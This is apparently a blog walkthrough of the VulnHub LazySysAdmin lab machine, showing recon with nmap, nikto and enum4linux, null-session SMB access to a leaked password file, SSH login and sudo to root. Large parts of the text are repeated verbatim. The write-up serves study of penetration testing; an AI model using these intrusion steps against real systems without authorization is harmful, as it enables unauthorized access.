LazySysAdmin Walkthrough
Introduction
Today we're doing a boot2root pentest walkthrough of the LazySysAdmin machine, created by Togie Mcdogie and hosted at https://www.vulnhub.com/entry/lazysysadmin-1,205/ .
For this pentest, I will be using two virtual machines. A Kali Linux machine as the attacking system, and the LazySysAdmin machine as the target system.
Locating The Target
Running nediscover from our attacking machine, we can locate where the target machine is on our network.
netdiscover -r 10.0.2.0/24
Our target system is at 10.0.2.28.
Scanning and Enumeration
We start our scans with nmap to determine which TCP ports are open on the target.
nmap -T4 -p- 10.0.2.28
A nice array of open ports. Let's plug these into nmap again to get further info.
nmap -T4 -A -p22,80,139,445,3306,6667 10.0.2.28
There are some interesting entries in the robots.txt file that we'll want to check out later. For now, we'll run a Nikto scan against the web server.
nikto -h 10.0.2.28
Two important findings here. First, we located the system's phpmyadmin page, which means we can test it for injection or login normally if we capture some credentials. Second, the info.php file is exposed, which means we can enumerate for a lot of system info and we can also test it for a local file inclusion vulnerability.
Next, we'll scan the system's SMB service using enum4linux.
enum4linux -a 10.0.2.28
Some good results here. First of all, the SMB service is configured in a way that lets us access it without needing a username or password. Second, we have a list of shares in SMB that we can look through, and lastly we got a username for the system, togie.
Let's follow up on this by logging into SMB to see what's there. (remember, we're passing a blank password to the service).
smbclient -U -L \\\\10.0.2.28\\share$
ls
There is a lot of files to look through here, and we have download access, so we're going to download this important-looking file and cat it out.
get deets.txt
exit
cat deets.txt
Finding a Way In
It can't be this easy, can it? We have one username and one password, so let's try it out with SSH.
Privilege Escalation
Today we're doing a boot2root pentest walkthrough of the LazySysAdmin machine, created by Togie Mcdogie and hosted at https://www.vulnhub.com/entry/lazysysadmin-1,205/ .
For this pentest, I will be using two virtual machines. A Kali Linux machine as the attacking system, and the LazySysAdmin machine as the target system.
Locating The Target
Running nediscover from our attacking machine, we can locate where the target machine is on our network.
netdiscover -r 10.0.2.0/24
Our target system is at 10.0.2.28.
Scanning and Enumeration
We start our scans with nmap to determine which TCP ports are open on the target.
nmap -T4 -p- 10.0.2.28
A nice array of open ports. Let's plug these into nmap again to get further info.
nmap -T4 -A -p22,80,139,445,3306,6667 10.0.2.28
There are some interesting entries in the robots.txt file that we'll want to check out later. For now, we'll run a Nikto scan against the web server.
nikto -h 10.0.2.28
Two important findings here. First, we located the system's phpmyadmin page, which means we can test it for injection or login normally if we capture some credentials. Second, the info.php file is exposed, which means we can enumerate for a lot of system info and we can also test it for a local file inclusion vulnerability.
Next, we'll scan the system's SMB service using enum4linux.
enum4linux -a 10.0.2.28
Some good results here. First of all, the SMB service is configured in a way that lets us access it without needing a username or password. Second, we have a list of shares in SMB that we can look through, and lastly we got a username for the system, togie.
Let's follow up on this by logging into SMB to see what's there. (remember, we're passing a blank password to the service).
smbclient -U -L \\\\10.0.2.28\\share$
ls
There is a lot of files to look through here, and we have download access, so we're going to download this important-looking file and cat it out.
get deets.txt
exit
cat deets.txt
Finding a Way In
It can't be this easy, can it? We have one username and one password, so let's try it out with SSH.
ssh togie@10.0.2.28
12345
sudo -l
12345
sudo su
cd /root/
cat proof.txt
Privilege Escalation
We're logged into the target system as togie. A quick check reveals that togie is the system admin, which gives us immediate root privileges, so we navigate to the /root/ directory and cat out the flag file.
Summary
After our initial scans, we found that the target system's SMB service was misconfigured to allow null sessions, and upon investigation of the files in the SMB share we found a file that disclosed a password for a user on the system. Our scan of the SMB service revealed a single user on the system, so we tried the combination of that username and the password we found to successfully login to the target system via SSH. Once logged in, we found that the user whose account we were using was an admin user, so we invoked root privileges on the system and accessed the target system's flag file.
Finish
Summary
After our initial scans, we found that the target system's SMB service was misconfigured to allow null sessions, and upon investigation of the files in the SMB share we found a file that disclosed a password for a user on the system. Our scan of the SMB service revealed a single user on the system, so we tried the combination of that username and the password we found to successfully login to the target system via SSH. Once logged in, we found that the user whose account we were using was an admin user, so we invoked root privileges on the system and accessed the target system's flag file.
Finish
Comments
Post a Comment